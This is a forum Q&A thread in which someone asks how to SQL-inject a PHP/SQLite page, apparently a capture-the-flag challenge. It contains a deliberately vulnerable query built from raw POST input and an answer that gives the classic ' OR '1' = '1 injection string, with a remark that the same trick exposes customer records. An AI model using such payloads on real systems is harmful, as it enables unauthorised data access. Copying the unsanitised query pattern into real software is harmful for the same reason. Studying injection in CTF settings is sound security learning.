How would I do an sql injection to this? I am not asking for how to prevent this

Question

Just a quick question since I am not experienced in this field at all. How would I do an sql injection to this? I would like examples of sql injection. Please don't comment to just type ' or '1' = '1 as that wont work. All it will reply with is the sentence from the elseif statement saying "You are so close."

<?php
  include "config.php";
  ini_set('error_reporting', E_ALL);
  ini_set('display_errors', 'On');

  $answer = $_POST["answer"];
  $debug = $_POST["debug"];
  $query = "SELECT * FROM answers WHERE answer='$answer'";
  echo "<pre>";
  echo "SQL query: ", htmlspecialchars($query), "\n";
  echo "</pre>";
?>
<?php
  $con = new SQLite3($database_file);
  $result = $con->query($query);

  $row = $result->fetchArray();
  if($answer == $CANARY)  {
    echo "<h1>Perfect!</h1>";
    echo "<p>Your flag is: $FLAG</p>";
  }
  elseif ($row) {
    echo "<h1>You are so close.</h1>";
  } else {
    echo "<h1>Wrong.</h1>";
  }
?>

How would I do an injection to this query? Please don't mark this as a duplicate to that major post that I have already read. That post isn't the same as this query from what I've tried.

Answer 1

Just send the following string in $_POST["answer"]:

$_POST["answer"] = "' OR '1' = '1";
$answer = $_POST["answer"];
$query = "SELECT * FROM answers WHERE answer='$answer'";

Now, your query will read as follows:

SELECT * FROM answers WHERE answer='' OR '1' = '1'

It will give you all the rows from answers table. If you use this SQL query results to check whether the given answer by a user is correct or not; you will always get some rows, hence answer will always pass no matter what.

Similarly, for eg, one can get details of all the customers, their phone number, email addresses, etc; if one passes customer_id = "' OR '1' = '1"

Do read this thread completely: How does the SQL injection from the "Bobby Tables" XKCD comic work?